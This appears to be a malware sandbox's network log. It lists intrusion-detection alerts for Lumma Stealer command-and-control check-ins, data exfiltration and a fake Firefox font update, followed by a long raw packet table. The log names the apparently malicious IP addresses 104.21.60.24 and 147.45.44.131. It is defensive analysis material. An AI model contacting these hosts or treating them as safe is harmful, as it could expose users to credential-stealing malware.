2024-12-27T22:33:18.118672+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:18.579172+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49755 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:18.579172+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49755 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:20.468696+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49759 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:21.291774+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49759 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:22.642716+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49761 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:25.368007+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49762 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:25.371664+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49763 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:27.646795+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49764 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:27.726911+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49765 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:30.225396+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49766 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:31.355502+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49767 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:32.419887+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49767 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:33.056891+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49768 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:33.062072+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49769 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:35.300277+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49770 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:35.326498+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49771 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:37.378300+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49772 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:39.029433+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49773 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:39.529055+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49774 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:39.826826+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49773 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:41.877377+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49775 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:45.407596+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49776 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:46.187336+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49776 | 104.21.60.24 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Dec 27, 2024 22:33:03.302025080 CET8049734147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.302047014 CET8049734147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.302162886 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.303366899 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.423687935 CET8049734147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.423758984 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.602217913 CET8049735147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.602278948 CET8049735147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.602348089 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.602679014 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.723012924 CET8049735147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.723100901 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.075124979 CET8049736147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:04.075239897 CET8049736147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:04.075299025 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.075659037 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.195502043 CET8049736147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:04.195564032 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.880934000 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.904747963 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.000477076 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.000749111 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.000866890 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.024321079 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.025543928 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.025715113 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.056417942 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.120572090 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.145176888 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.176157951 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.176326036 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.176923037 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.296688080 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288124084 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288167953 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288206100 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288259029 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.288259983 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288311005 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288311005 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.288346052 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288379908 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288414955 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288433075 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.288463116 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.288502932 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288532972 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288575888 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356055975 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356112957 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356147051 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356168985 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356235981 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356267929 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356276989 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356302977 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356336117 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356345892 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356372118 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356416941 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356427908 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356462002 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356502056 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.408155918 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.408257961 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.408310890 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.412235022 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440737009 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440768003 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440804005 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440819979 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.440860033 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440908909 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.440922976 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440959930 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441000938 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.441009998 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441044092 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441076994 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441091061 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.441131115 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441174984 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.476685047 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.476735115 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.476793051 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.479731083 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.479800940 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.479871988 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.483987093 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.484030962 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.484093904 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.492468119 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.492518902 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.492518902 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.500835896 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.500880003 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.500888109 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.509320021 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.509366989 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.509407043 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.517775059 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.517824888 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.517900944 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.526237011 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.526274920 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.526293993 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.535098076 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.535150051 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.535197020 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.543091059 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.543142080 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.543158054 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.551460981 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.551511049 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.562025070 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.562230110 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.562293053 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.566229105 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.566548109 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.566657066 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.566703081 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.570782900 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.570878983 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.570925951 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.579221964 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.579272985 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.579322100 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.587603092 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.587841034 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.587898016 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.595948935 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.596074104 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.596123934 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.604401112 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.604465008 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.604511023 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.612899065 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.612934113 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.612993002 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.621196032 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.621248960 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.621300936 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.629530907 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.629724979 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.629786015 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.632703066 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.632731915 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.632749081 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.635199070 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.635246038 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.635354996 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.638120890 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.643619061 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.643655062 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.643668890 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.652015924 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.652062893 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.652129889 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.660355091 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.660403967 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.660466909 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.668870926 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.668905973 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.668921947 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.677237988 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.677288055 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.677310944 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.685666084 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.685714006 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.685739040 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.694005013 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.694057941 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.694113016 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.472239017 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.477248907 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.477365017 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.477416039 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.482465982 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.482587099 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.482650042 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.487673998 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.487804890 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.487858057 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.491338015 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.491369963 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.491445065 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.492815971 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.492918968 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.492971897 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.493987083 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.494118929 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.494174957 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.498042107 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.498148918 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.498200893 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.499383926 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.499474049 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.499525070 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.503235102 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.503355980 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.503403902 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.503617048 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.503712893 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.503766060 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.504750967 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.504865885 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.504919052 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.506254911 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.507270098 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.507322073 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.507348061 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.508385897 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.508502960 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.508548975 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.510097027 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.510226965 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.510281086 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.512532949 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.512631893 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.512661934 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.513600111 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.513758898 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.513812065 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.515511990 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.515584946 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.515641928 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.517841101 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.517896891 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.517966032 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.518790960 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.518886089 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.518939018 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.520798922 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.520855904 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.520911932 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.523145914 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.523200989 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.523269892 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.523999929 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.524050951 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.524104118 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.526137114 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.526267052 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.526321888 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.528441906 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.528490067 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.528554916 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.529160023 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.529254913 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.529301882 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.531480074 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.531568050 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.531629086 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.533746958 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.533803940 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.533848047 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.534363985 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.534533978 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.534584045 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.536865950 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.537003040 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.537062883 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.539081097 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.539163113 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.539201975 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.539527893 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.539664984 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.539767981 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.542272091 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.542511940 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.542563915 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.544358969 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.544431925 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.544519901 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.544740915 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.544888020 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.544933081 CET4974280192.168.2.4147.45.44.131
